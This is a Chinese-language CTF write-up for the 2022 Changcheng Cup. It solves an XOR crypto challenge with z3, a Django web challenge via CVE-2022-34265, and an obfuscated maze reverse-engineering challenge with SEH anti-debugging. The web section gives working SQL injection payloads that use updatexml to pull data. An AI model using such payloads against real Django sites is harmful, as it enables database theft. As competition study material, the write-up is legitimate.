2022 长城杯政企组 wp

2022-08-26 match 异常处理 0 Comments Word Count: 4,067(words) Read Count: 21(minutes)

2022 长城杯政企组 wp

这次比赛实际并列26名，前15名进入线下复赛，感觉距离线下赛越来越近了。Crypto简单题秒了，因为上班没有抢到前三拿加分，最后这道题第五。然后其余四个小时全部给了re的rabbit_hole，把大致的流程梳理出来了，但是卡在了异常处理，导致最后核心代码没有能够看到并且F5解析。队友做出来web题，赛后看了看misc的办公室爱情，也没用多少时间。如果比赛时候做了说不定就进复赛了？不可能的！没看规则，完全没有记得开录屏。马上打网鼎杯，不要忘了！

那天打完比赛，Re没做出来实在气不过，于是联系了好多年不联系传奇人物刘大爷，请刘大爷出山给我指点迷津，刘大爷把题秒了，给我讲了两点，立马全都解决了，果然是刘大爷，这个wp大部分功劳是刘大爷的。

Crypto - xor

task.py:

import os
from secret import flag

def cut(obj, sec):
    return [obj[i:i+sec] for i in range(0,len(obj),sec)]

x = 6
assert flag.startswith('flag{')
assert flag.endswith('}')
m = cut(flag, x)

pad = os.urandom(x)
res = []
for i in m:
    tmp = []

    tmp.append(i[0] ^ i[1] ^ i[2] ^ pad[0])
    tmp.append(i[3] ^ i[4] ^ pad[1] ^ pad[2])
    tmp.append(pad[5] ^ i[5] ^ pad[1] ^ pad[3])
    tmp.append(i[3] ^ pad[3] ^ pad[4] ^ pad[1])
    tmp.append(i[5] ^ pad[0] ^ i[4] ^ pad[1])
    tmp.append(i[2] ^ i[4] ^ pad[0] ^ pad[1])
    tmp.append(i[2] ^ i[0] ^ i[4] ^ pad[4])
    
    res.append(tmp)

print(res)
#[[150, 194, 49, 195, 23, 79, 66], [194, 136, 63, 147, 3, 2, 81], [132, 221, 57, 144, 83, 83, 93], [208, 223, 37, 193, 28, 0, 70], [154, 203, 108, 156, 28, 78, 68], [159, 221, 62, 146, 86, 82, 88], [197, 141, 117, 192, 31, 90, 85]]

入门题目，“flag{”是flag的前5位，然后是一个7元的方程，求pad6个数和flag{后一位有7个方程正好可以解。用z3即可。

from z3 import *
##求random，已知前5位是flag{

i = b"flag{"
so = Solver()

ans = [150, 194, 49, 195, 23, 79, 66]

flag5 = BitVec('flag5',8)
pad = [BitVec(f'pad{i}',8) for i in range(6)]

so.add(i[0] ^ i[1] ^ i[2] ^ pad[0] == ans[0])
so.add(i[3] ^ i[4] ^ pad[1] ^ pad[2] == ans[1])
so.add(pad[5] ^ flag5 ^ pad[1] ^ pad[3] == ans[2])
so.add(i[3] ^ pad[3] ^ pad[4] ^ pad[1] == ans[3])
so.add(flag5 ^ pad[0] ^ i[4] ^ pad[1] == ans[4])
so.add(i[2] ^ i[4] ^ pad[0] ^ pad[1] == ans[5])
so.add(i[2] ^ i[0] ^ i[4] ^ pad[4] == ans[6])
pad_ = []
if so.check() == sat:
	m = so.model()
	for k in range(6):
		#print(m.eval(pad[k]).as_long())
		pad_.append(m.eval(pad[k]).as_long())

#print(pad_)
#[253, 168, 118, 50, 62, 146]
ans = [[150, 194, 49, 195, 23, 79, 66], [194, 136, 63, 147, 3, 2, 81], [132, 221, 57, 144, 83, 83, 93], [208, 223, 37, 193, 28, 0, 70], [154, 203, 108, 156, 28, 78, 68], [159, 221, 62, 146, 86, 82, 88], [197, 141, 117, 192, 31, 90, 85]]
flag_ = ""
pad = pad_
for i in ans:
	so = Solver()
	flag = [BitVec(f'flag{i}',8) for i in range(6)]
	so.add(flag[0] ^ flag[1] ^ flag[2] ^ pad[0] == i[0])
	so.add(flag[3] ^ flag[4] ^ pad[1] ^ pad[2] == i[1])
	so.add(pad[5] ^ flag[5] ^ pad[1] ^ pad[3] == i[2])
	so.add(flag[3] ^ pad[3] ^ pad[4] ^ pad[1] == i[3])
	so.add(flag[5] ^ pad[0] ^ flag[4] ^ pad[1] == i[4])
	so.add(flag[2] ^ flag[4] ^ pad[0] ^ pad[1] == i[5])
	so.add(flag[2] ^ flag[0] ^ flag[4] ^ pad[4] == i[6])
	if so.check() == sat:
		m = so.model()
		#print(''.join(chr(m[i].as_long()) for i in flag))
		flag_ += ''.join(chr(m[i].as_long()) for i in flag) 
	else:
		print('Error')

print(flag_)
#flag{98167a7e-1471-11ed-a068-da12656dd8d7}

Web - djangogogo

这题题解是队友写的。

CVE-2022-34265 Django Extract & Trunc SQL注入漏洞

参考资料：http://www.ctfiot.com/47944.html

由于字符长度限制。用/?name=YEAR FROM sale_datetime)) and updatexml(1,concat(1,(select flag from flag),1),1)--获取前半截flag。

用/?name=YEAR FROM sale_datetime)) and updatexml(10,concat((select RIGHT(flag,14) from flag ),1,1,1,1,1,1,1,1),1)--获得后半段flag。

Misc - 办公室爱情

有大佬师傅写出来了：https://blog.csdn.net/weixin_44418623/article/details/126493352

[题目下载][办公室爱情](办公室爱情.zip)

Reverse - rabbit hole

这道题拿到以后运行起来，看起来像很朴素的题目，并且通过Exeinfo，并没有什么壳。

然后用ida运行，找到main函数0x004016C0，发现完全不能F5。仔细看有两种画指令。第一种：

这种可以直接patch掉EB FF中EB这一位，变成nop(90)，然后在40170A地址上按C转换为code，就可以看到后面的指令了。第二种：

这种往上jmp的第一次见。经过尝试可以patch掉4017D5和4017D6两个地址为nop，然后nop掉jmp语句后面的五个地址4017D9到4017DD也nop掉。这种花指令就完成了。

经过一顿漫长的操作，找到main函数的retn，从main函数push ebp开始选中到retn，按p，再f5终于可以看出main函数的全貌了。

int __cdecl main(int argc, const char **argv, const char **envp)
{
  /*
  有一堆变量定义就不贴了，大家注意变量类型。
  */

  v31[0] = v3;
  v31[1] = retaddr;
  v4 = alloca(4532);
  atexit(sub_401660);
  sub_401A40();
  gets_s(v29, 0x100u);
  v5 = strlen(v29);
  v6 = BYTE2(v5) ^ (16777619 * (BYTE1(v5) ^ (16777619 * ((unsigned __int8)v5 ^ 0x50C5D1F))));
  v7 = HIBYTE(v5) ^ (16777619 * v6);
  if ( v7 != 1166501587 )
  {
    if ( v7 == 1563082853 )
    {
      v8 = 0;
      for ( i = 0; ; i = v9 + 16 )
      {
        v25 = v8;
        if ( (HIBYTE(v8) ^ (16777619
                          * (BYTE2(v8) ^ (16777619 * (BYTE1(v8) ^ (16777619 * ((unsigned __int8)v8 ^ 0x50C5D1F))))))) == 1563082853 )
          break;
        v28 = 0;
        v9 = i;
        for ( j = 0; ; j = v26 + 1 )
        {
          v26 = j;
          if ( (HIBYTE(j) ^ (16777619
                           * (BYTE2(j) ^ (16777619 * (BYTE1(j) ^ (16777619 * ((unsigned __int8)j ^ 0x50C5D1F))))))) == 1563082853 )
            break;
          v9 = i;
          v28 += v29[v26] * byte_404AC0[i + v26];
        }
        v11 = v25;
        *((_BYTE *)&v31[-1130] + v25) = v28;
        v8 = v11 + 1;
      }
      for ( k = 0;
            (HIBYTE(k) ^ (16777619 * (BYTE2(k) ^ (16777619 * (BYTE1(k) ^ (16777619 * ((unsigned __int8)k ^ 0x50C5D1F))))))) != 1563082853;
            ++k )
      {
        if ( *((_BYTE *)&v31[-1130] + k) != byte_404AAC[k] )
        {
          v13 = sub_401A40();
          std::ostream::operator<<(v13);
          exit(-1);
        }
      }
      v14 = sub_401A40();
      std::ostream::operator<<(v14);
      JUMPOUT(0x401A17);
    }
    v15 = sub_401A40();
    std::ostream::operator<<(v15);
    exit(-1);
  }
  strcpy(v30, "The quick brown fox jumps over the lazy dog.");
  sub_401000(v30, v6);
  memset(v30, 0, 40);
  v17 = sub_4014E0(v30, v29, v16);
  for ( m = 0; m < 40; ++m )
  {
    LOBYTE(v17) = v30[m];
    if ( (_BYTE)v17 != byte_404BC0[m] )
    {
      v22 = (*(int (**)(void))(v17 + 1284029000))();
      byte_402FFF[v22 - 4206718] += BYTE1(v23);
      *(_BYTE *)(v23 - 23) += v24;
      JUMPOUT(0x401A3D);
    }
  }
  v19 = sub_401A40();
  v20 = std::ostream::operator<<(v19);
  (*(void (**)(void))(v20 - 62026936))();
  return 0;
}

第一个需要逆向的地方是v6 = BYTE2(v5) ^ (16777619 * (BYTE1(v5) ^ (16777619 * ((unsigned __int8)v5 ^ 0x50C5D1F)))); v7 = HIBYTE(v5) ^ (16777619 * v6);if ( v7 != 1166501587 )

其中v5是输入字符串的长度，类型为int，四个字节。BYTE1是v5第二个字节，BYTE2是v5第三个字节，HIBYTE是最高字节，注意C语言变量是小端序。这段代码就是最小的字节和0x50C5D1F异或以后，乘以16777619，再和下一个字节异或，直到最高字节。于是python脚本：

for i in range(256):
	v7 = i
	v8 = ((v7 >> 16) & 0xff) ^ ((0x1000193 * (((v7 >> 8) & 0xff) ^ ((0x1000193 * (((v7 & 0xFF) ^ 0x50C5D1F) & 0xFFFFFFFF)) & 0xFFFFFFFF))) & 0xFFFFFFFF)
	v9 = ((v7 >> 32) & 0xff) ^ ((0x1000193 * v8) & 0xFFFFFFFF)
	if (v9 == 0x458766D3 or v9 == 0x5D2AC065):
		print(v9,i)
0x5d2ac065 16
0x458766d3 134

这里有两个分支，长度为134的分支是正确的。长度是16的分支进入下面的代码

无论结果是啥都进入了0x401A40的地址，猜测一下，结合下文，很容易知道这段不是需要走的分支。（比赛时候我动调进去了，查了小一会儿发现不对，还是too young！这题应该有反调试，可能是SEH的，我的x96dbg有过反调插件sharpOD。ida直接动调不行的。）

之后，有个关键函数0x4014E0很可疑，调用了输入变量v29。

经过一通patch后f5看到函数4014E0。发现关键语句ms_exc.registration.TryLevel = 0

这是try except的特征。tab进入汇编视图发现有try，并且在0x401546产生了异常，进入except。当时看到了 https://bbs.pediy.com/thread-252152.htm 这篇大佬师傅写的文章，也研究了一下，动调在这里也断掉了一直挂。怎么也搞不通，直到比赛结束，我还是个老菜鸡。

这个异常最后进入了0x4011E0这个函数，这是比赛中调到的地方。

比赛结束之后，晚上问大爷，大爷解释：1、这个异常是void x() {char a[0];a[1145141919810];}

2、SEH 反调试的原理是，遇到异常的时候会首先交给调试器，单步过不去。调试器需要改参数。

忽略范围-开始-C0000005-确定。添加了这个就不会在0x401546卡住了。接着在exception handler下个断点可以进入0x4011E0这个最后的函数了。最后的函数中，也是一个try exception跳到exception欺骗ida，ida确实不分析exception handler 里的代码。之后经过大爷提示，在异常代码地址patch，用jmp直接跳到exception handler就行。把0x401232地址patch成jmp到0x401278，并且把0x401278上的try except的code也patch掉了。

f5后得到了最后的函数，核心部分：

  v1 = 0;
  v10 = 0;
  v2 = input;
  if ( !strlen(input) )
  {
    LOWORD(v4) = 0;
    LOWORD(v5) = 0;
LABEL_21:
    if ( (HIBYTE(v18) ^ (16777619
                       * (BYTE2(v18) ^ (16777619 * (BYTE1(v5) ^ (16777619 * ((unsigned __int8)v5 ^ 0x50C5D1F))))))) != 1636823865
      && (HIBYTE(v17) ^ (16777619
                       * (BYTE2(v17) ^ (16777619 * (BYTE1(v4) ^ (16777619 * ((unsigned __int8)v4 ^ 0x50C5D1F))))))) != 1636823865 )
    {
      puts(v9);
      exit(-1);
    }
    for ( i = 0; i < 41; ++i )
      putchar((unsigned __int8)(*((_BYTE *)v12 + i) + *((_BYTE *)v14 + i)));
    putchar(10);
    exit(0);
  }
  v3 = 0;
  v16 = 0;
  v4 = 0;
  v5 = 0;
  while ( 1 )
  {
    v6 = v2[v1];
    switch ( v6 )
    {
      case 'h':
        v18 = --v5;
        v3 -= 21;
        v16 = v3;
        goto LABEL_12;
      case 'j':
        v18 = v5 + 1;
        v16 = v3 + 21;
        v4 = v17;
        ++v5;
        v3 += 21;
        v1 = v10;
        v2 = input;
        goto LABEL_12;
      case 'k':
        --v4;
        break;
      case 'l':
        ++v4;
        break;
      default:
        goto LABEL_12;
    }
    v17 = v4;
LABEL_12: //判断条件
    if ( v5 < 0
      || v4 < 0
      || v5 >= 21
      || v4 >= 21
      || (v5 ^ (v4 << 8) ^ dword_4043C8[v3 + v4] ^ (unsigned __int8)byte_404208[v3 + v4]) != 1 )
    {
      exit(-1);
    }
    v10 = ++v1;
    v7 = strlen(v2);
    v3 = v16;
    v2 = input;
    if ( v1 >= v7 )
      goto LABEL_21;
  }
}

这显然是一个迷宫。Label12是判断条件，Label21的if满足以后，就可以真正得到flag。

先满足Label21的if:

for v7 in range(22):
	v8 = ((v7 >> 16) & 0xff) ^ ((0x1000193 * (((v7 >> 8) & 0xff) ^ ((0x1000193 * (((v7 & 0xFF) ^ 0x50C5D1F) & 0xFFFFFFFF)) & 0xFFFFFFFF))) & 0xFFFFFFFF)
	v9 = ((v7 >> 32) & 0xff) ^ ((0x1000193 * v8) & 0xFFFFFFFF)
	if v9 == 0x618ff339:
		print(v7)
#20

迷宫出口是20，20。判断的条件Label12是位置和两个数组的异或，网上找了一段大佬的走迷宫算法改一下，便可以求出来flag。

dirs=[(0,1),(1,0),(0,-1),(-1,0)] #当前位置四个方向的偏移量
path=[]              #存找到的路径
 
def mark(maze,pos):  #给迷宫maze的位置pos标"-1"表示“到过了”
    maze[pos[0]][pos[1]]=-1
 
def passable(maze,pos): #检查迷宫maze的位置pos是否可通行
    if (pos[0] >= 21 or pos[0] < 0 or pos[1] >= 21 or pos[1] < 0):
        return false
    return maze[pos[0]][pos[1]] ^ pos[0] ^ (pos[1] << 8) == 1
 
def find_path(maze,pos,end):
    mark(maze,pos)
    if pos==end:
        print(pos,end=" ")  #已到达出口，输出这个位置。成功结束
        path.append(pos)
        return True
    for i in range(4):      #否则按四个方向顺序检查
        nextp=pos[0]+dirs[i][0],pos[1]+dirs[i][1]
        #考虑下一个可能方向
        if passable(maze,nextp):        #不可行的相邻位置不管
            if find_path(maze,nextp,end):#如果从nextp可达出口，输出这个位置，成功结束
                print(pos,end=" ")
                path.append(pos)
                return True
    return False
 
def see_path(maze,path):     #使寻找到的路径可视化
    for i,p in enumerate(path):
        if i==0:
            maze[p[0]][p[1]] ="E"
        elif i==len(path)-1:
            maze[p[0]][p[1]]="S"
        else:
            maze[p[0]][p[1]] =-2
    print("\n")
    flag = ""
    for i in range(len(path) - 1):
        dx = path[i + 1][0] - path[i][0]   //后状态减去前状态。
        dy = path[i + 1][1] - path[i][1]
        if dx == 1:
            flag += "h"
        if dx == -1:
            flag += "j"
        if dy == -1:
            flag += "l"
        if dy == 1:
            flag += "k" 
    print(flag[::-1])
if __name__ == '__main__':

    byte_404208 = [0x45, 0x24, 0xBD, 0x3E, 0x32, 0x9D, 0x8F, 0x53, 0xCC, 0x4F, 0x8D, 0x2C, 0x7C, 0xF2, 0xBA, 0x30, 0x0D, 0xC7, 0x57, 0x19, 0x91, 0xF4, 0xE6, 0x28, 0x4F, 0xEE, 0x47, 0x7C, 0xD8, 0xF8, 0xD8, 0x79, 0xD1, 0x7A, 0x32, 0x82, 0xD9, 0xDF, 0x20, 0xD6, 0xEF, 0x5E, 0x24, 0x6E, 0x67, 0xB4, 0x9D, 0x49, 0xCA, 0xDD, 0x64, 0x9D, 0x0E, 0x2F, 0x0E, 0xBD, 0x1B, 0x81, 0xF3, 0x6B, 0x5F, 0xA1, 0xAC, 0x0E, 0x66, 0x76, 0x3F, 0xBF, 0x80, 0x94, 0x86, 0x44, 0xA9, 0xB8, 0xB8, 0xFE, 0xB5, 0x1A, 0x94, 0x6F, 0x3B, 0x64, 0xF6, 0x82, 0x76, 0x0A, 0x28, 0xAB, 0x8D, 0xB7, 0xB7, 0xC1, 0x0F, 0x1A, 0x3A, 0xFC, 0x77, 0x71, 0xE6, 0x5F, 0x3C, 0x9F, 0xEC, 0x3A, 0x83, 0xAF, 0x32, 0x9D, 0x43, 0xD6, 0xD0, 0x9B, 0x14, 0xBD, 0x78, 0xDC, 0xD6, 0xC2, 0x1D, 0x54, 0xB3, 0xCE, 0xF8, 0x71, 0x92, 0x44, 0x85, 0xA2, 0x58, 0xEF, 0x80, 0x2F, 0xF0, 0x90, 0xF4, 0xAB, 0xDB, 0x63, 0x74, 0xE1, 0xBB, 0xCA, 0xC5, 0xAC, 0x39, 0xA7, 0x56, 0x45, 0x25, 0xAA, 0xCA, 0x2A, 0x30, 0x95, 0xDC, 0x17, 0x31, 0x4F, 0x62, 0x39, 0xA4, 0x1C, 0x93, 0xE1, 0xA9, 0x2F, 0xB3, 0x4F, 0x26, 0x53, 0x47, 0x23, 0xDB, 0x34, 0xDE, 0xC1, 0x27, 0x5F, 0xEB, 0x2E, 0x91, 0x5E, 0xCA, 0xCB, 0xD6, 0x11, 0xA3, 0x8F, 0x47, 0xDD, 0xC0, 0xFB, 0xEE, 0xCF, 0xC9, 0xCA, 0xD9, 0xF8, 0xB9, 0x15, 0x34, 0x23, 0x6B, 0x6D, 0x28, 0xF6, 0xE2, 0x1E, 0xF8, 0xFF, 0xEB, 0xFB, 0xE9, 0x70, 0x5C, 0xD4, 0xED, 0x78, 0xD4, 0x7A, 0x22, 0x1C, 0x69, 0xF1, 0x39, 0x61, 0xC2, 0xB9, 0x7B, 0xF3, 0xC2, 0xA2, 0x99, 0x64, 0x48, 0xAC, 0x38, 0x55, 0x0C, 0xB3, 0x0B, 0xD6, 0x9B, 0x46, 0x70, 0x8B, 0xCD, 0x0F, 0x87, 0xCB, 0x7F, 0xE0, 0xAB, 0x4A, 0xCB, 0x79, 0x43, 0xE2, 0x60, 0x15, 0x0A, 0x7C, 0x0A, 0xD9, 0x15, 0x41, 0xF3, 0x2C, 0x2C, 0x61, 0x14, 0xC1, 0x43, 0xA5, 0x1A, 0xC7, 0x33, 0xC9, 0x89, 0xB7, 0x37, 0xC4, 0x57, 0x81, 0x23, 0xCA, 0xD4, 0xF1, 0x7E, 0xF4, 0x65, 0x8D, 0x72, 0x6B, 0xA4, 0x9A, 0xEE, 0xAC, 0xBA, 0x71, 0x4E, 0xDE, 0x6A, 0x88, 0x36, 0x1D, 0x72, 0xB1, 0xF0, 0x9B, 0x69, 0x19, 0xB0, 0x7C, 0xEA, 0xF7, 0x51, 0x62, 0xD1, 0x3A, 0x67, 0x56, 0x66, 0xBA, 0x79, 0x59, 0x66, 0xB1, 0xC5, 0x8F, 0xE9, 0x6C, 0x99, 0x3C, 0xF0, 0x89, 0xF6, 0xBF, 0x15, 0x61, 0x92, 0xE0, 0x60, 0x3E, 0x59, 0x35, 0x4B, 0x1F, 0x6F, 0x65, 0xE4, 0x71, 0x0D, 0x7B, 0x6E, 0x93, 0x14, 0x5D, 0x4C, 0x6F, 0x2F, 0x52, 0xA6, 0x5D, 0x90, 0x7B, 0xCC, 0xE1, 0x69, 0x77, 0x7E, 0x8D, 0x33, 0x6B, 0x37, 0xC4, 0x2F, 0xBF, 0x6F, 0xBF, 0xA8, 0xB3, 0x61, 0x5C, 0xD2, 0xC2, 0x2D, 0xC8, 0xF4, 0xBB, 0xB2, 0xD0, 0x22, 0x9C, 0x75, 0xDF, 0x59, 0x72, 0xAA, 0xFD, 0x7E, 0x67, 0x2E, 0x61, 0xBA, 0x6B, 0x4B, 0x19, 0xA6, 0xD5, 0x11, 0x15, 0xBC, 0x91, 0xEB, 0x42, 0xCC, 0x72, 0xB2, 0xC6, 0x47, 0xA3, 0xCC, 0xAC, 0x6C, 0xA8, 0xD8, 0xCA, 0xD2, 0x84, 0x2B, 0x35, 0xAB, 0xAF, 0xC8, 0xA5, 0x2F, 0x7F, 0x7F, 0xF5, 0x21, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]

    dword_4043C8 = [0x00000044, 0x00000124, 0x000002BD, 0x0000033E, 0x00000432, 0x0000059D, 0x0000068F, 0x00000753, 0x000008CC, 0x0000094F, 0x00000A8D, 0x00000B2C, 0x00000C7C, 0x00000DF2, 0x00000EBA, 0x00000F30, 0x0000100D, 0x000011C7, 0x00001257, 0x00001319, 0x00001491, 0x000000F4, 0x000001E7, 0x00000229, 0x0000034F, 0x000004EE, 0x00000547, 0x0000067C, 0x000007D8, 0x000008F8, 0x000009D8, 0x00000A79, 0x00000BD1, 0x00000C7A, 0x00000D32, 0x00000E82, 0x00000FD9, 0x000010DF, 0x00001120, 0x000012D6, 0x000013EE, 0x0000145F, 0x00000027, 0x0000016C, 0x00000265, 0x000003B7, 0x0000049F, 0x0000054B, 0x000006C8, 0x000007DF, 0x00000866, 0x0000099F, 0x00000A0C, 0x00000B2D, 0x00000C0C, 0x00000DBF, 0x00000E19, 0x00000F83, 0x000010F1, 0x00001169, 0x0000125C, 0x000013A3, 0x000014AE, 0x0000000C, 0x00000164, 0x00000274, 0x0000033D, 0x000004BD, 0x00000582, 0x00000696, 0x00000784, 0x00000846, 0x000009AB, 0x00000ABA, 0x00000BBA, 0x00000CFC, 0x00000DB7, 0x00000E18, 0x00000F96, 0x0000106C, 0x00001138, 0x00001267, 0x000013F5, 0x00001481, 0x00000072, 0x0000010E, 0x0000022C, 0x000003AF, 0x00000489, 0x000005B3, 0x000006B3, 0x000007C5, 0x0000080B, 0x0000091E, 0x00000A3E, 0x00000BF8, 0x00000C73, 0x00000D75, 0x00000EE2, 0x00000F5A, 0x00001038, 0x0000119A, 0x000012E9, 0x0000133F, 0x00001487, 0x000000AA, 0x00000137, 0x00000298, 0x00000346, 0x000004D3, 0x000005D5, 0x0000069E, 0x00000711, 0x000008B8, 0x0000097D, 0x00000AD9, 0x00000BD3, 0x00000CC7, 0x00000D18, 0x00000E51, 0x00000FB7, 0x000010CB, 0x000011FC, 0x00001274, 0x00001396, 0x00001441, 0x00000082, 0x000001A5, 0x0000025F, 0x000003E8, 0x00000487, 0x00000528, 0x000006F7, 0x00000797, 0x000008F3, 0x000009AC, 0x00000ADC, 0x00000B65, 0x00000C73, 0x00000DE6, 0x00000EBC, 0x00000FCD, 0x000010C3, 0x000011AB, 0x0000123F, 0x000013A0, 0x00001450, 0x00000043, 0x00000122, 0x000002AD, 0x000003CD, 0x0000042D, 0x00000537, 0x00000692, 0x000007DB, 0x00000810, 0x00000936, 0x00000A49, 0x00000B65, 0x00000C3E, 0x00000DA3, 0x00000E1B, 0x00000F95, 0x000010E6, 0x000011AF, 0x00001228, 0x000013B5, 0x00001448, 0x0000002F, 0x0000015B, 0x0000024E, 0x0000032A, 0x000004D2, 0x0000053C, 0x000006D6, 0x000007C9, 0x0000082F, 0x00000957, 0x00000AE2, 0x00000B26, 0x00000C98, 0x00000D57, 0x00000EC3, 0x00000FC2, 0x000010DE, 0x00001118, 0x000012AB, 0x00001386, 0x0000144F, 0x000000D5, 0x000001C9, 0x000002F3, 0x000003E7, 0x000004C6, 0x000005C0, 0x000006C2, 0x000007D1, 0x000008F0, 0x000009B0, 0x00000A1D, 0x00000B3D, 0x00000C2A, 0x00000D62, 0x00000E64, 0x00000F20, 0x000010FF, 0x000011EA, 0x00001217, 0x000013F0, 0x000014F6, 0x000000E0, 0x000001F0, 0x000002E2, 0x0000037B, 0x00000456, 0x000005DE, 0x000006E6, 0x00000772, 0x000008DF, 0x00000970, 0x00000A29, 0x00000B16, 0x00000C62, 0x00000DFB, 0x00000E33, 0x00000F6A, 0x000010C8, 0x000011B2, 0x00001271, 0x000013F8, 0x000014C8, 0x000000A9, 0x00000192, 0x0000026F, 0x00000342, 0x000004A7, 0x00000533, 0x0000065F, 0x00000707, 0x000008B9, 0x00000900, 0x00000ADC, 0x00000B90, 0x00000C4C, 0x00000D7B, 0x00000E81, 0x00000FC7, 0x00001004, 0x0000118D, 0x000012C0, 0x00001375, 0x000014EB, 0x000000A7, 0x00000147, 0x000002C6, 0x00000374, 0x0000044F, 0x000005EE, 0x0000066D, 0x00000719, 0x00000807, 0x00000970, 0x00000A07, 0x00000BD5, 0x00000C18, 0x00000D4D, 0x00000EFE, 0x00000F20, 0x00001021, 0x0000116C, 0x00001218, 0x000013CC, 0x0000144F, 0x000000A8, 0x00000117, 0x000002CA, 0x0000033F, 0x000004C5, 0x00000585, 0x000006BB, 0x0000073A, 0x000008C8, 0x0000095A, 0x00000A8D, 0x00000B2F, 0x00000CC6, 0x00000DD8, 0x00000EFD, 0x00000F73, 0x000010F8, 0x00001168, 0x00001280, 0x0000137E, 0x00001466, 0x000000AA, 0x00000194, 0x000002E0, 0x000003A2, 0x000004B4, 0x0000057F, 0x00000640, 0x000007D0, 0x00000865, 0x00000986, 0x00000A38, 0x00000B13, 0x00000C7C, 0x00000DBF, 0x00000EFE, 0x00000F95, 0x00001066, 0x00001117, 0x000012BE, 0x00001373, 0x000014E4, 0x000000F9, 0x0000015F, 0x0000026C, 0x000003DF, 0x00000434, 0x00000569, 0x00000658, 0x00000768, 0x000008B4, 0x00000976, 0x00000A56, 0x00000B68, 0x00000CBF, 0x00000DCB, 0x00000E81, 0x00000FE7, 0x00001062, 0x00001196, 0x00001233, 0x000013FE, 0x00001486, 0x000000E7, 0x000001AF, 0x00000205, 0x00000371, 0x00000482, 0x000005F0, 0x00000670, 0x0000072E, 0x00000849, 0x00000925, 0x00000A5B, 0x00000B0E, 0x00000C7F, 0x00000D75, 0x00000EF4, 0x00000F61, 0x0000101D, 0x0000116B, 0x0000127E, 0x00001382, 0x00001404, 0x0000004D, 0x0000015C, 0x0000027F, 0x0000033F, 0x00000442, 0x000005B6, 0x0000064D, 0x00000780, 0x0000086B, 0x000009DC, 0x00000AF1, 0x00000B79, 0x00000C66, 0x00000D6E, 0x00000E9D, 0x00000F23, 0x0000107B, 0x00001126, 0x000012D5, 0x0000133F, 0x000014AE, 0x0000007D, 0x000001AD, 0x000002BB, 0x000003A1, 0x00000473, 0x0000054E, 0x000006C0, 0x000007D0, 0x0000083F, 0x000009DA, 0x00000AE6, 0x00000BA9, 0x00000CA0, 0x00000DC3, 0x00000E30, 0x00000F8E, 0x00001066, 0x000011CD, 0x0000124B, 0x00001361, 0x000014B8, 0x000000EE, 0x0000016D, 0x00000275, 0x0000033C, 0x00000473, 0x000005A8, 0x00000679, 0x00000759, 0x0000080B, 0x000009B4, 0x00000AC7, 0x00000B03, 0x00000C07, 0x00000DAE, 0x00000E82, 0x00000FF8, 0x00001050, 0x000011DF, 0x00001261, 0x000013A0, 0x000014D5, 0x00000053, 0x000001B7, 0x000002D8, 0x000003B8, 0x00000478, 0x000005BC, 0x000006CC, 0x000007DE, 0x000008C6, 0x00000990, 0x00000A3F, 0x00000B21, 0x00000CBF, 0x00000DBB, 0x00000EDC, 0x00000FB1, 0x0000103B, 0x0000116B, 0x0000126B, 0x000013E0, 0x00001434]

    tmp = []
    for i in range(441):
        tmp.append(dword_4043C8[i] ^ byte_404208[i])

    maze = []
    for i in range(21):
        for i in range(21):
            print(tmp[i * 21 + 0 : i * 21 + 21])
            maze.append(tmp[i * 21 + 0 : i * 21 + 21])

    start=(0,0)
    end=(20,20)
    
    find_path(maze,start,end)
    see_path(maze,path)
#jjjllllllllllllllljjjjjjjjkjjkkkkhhhhhhhkkkkkkkkkkjjjjllljjjlllhhhhlljjjjjjkkkkkkkkjjlllllllllllhhlllllhhhlhhhhhhhhlljjjjjjjjjjjjjjjjl

最终结果：

总结

这道题确实超出我能力范围，还需要接着努力。长城杯这道题做出来的人，高校组差不多有十个左右？政企组就只有两个，如果这个题做出来了，应该可以去线下了吧。不过这一年的努力没有白费，希望网鼎杯能出好成绩。关于try except中，SEH反调试优先交给调试器这个我有个印象，之前听大佬们讲直播讲课有提及。hed10ne大佬留了一篇反调试佳作：反调试技术整理

本文链接： https://feverhu.github.io/2022/08/26/2022-长城杯政企组-wp/

转载请注明出处^_^

fevergunCtfer & Reverse & Crypto

Reverse , Crypto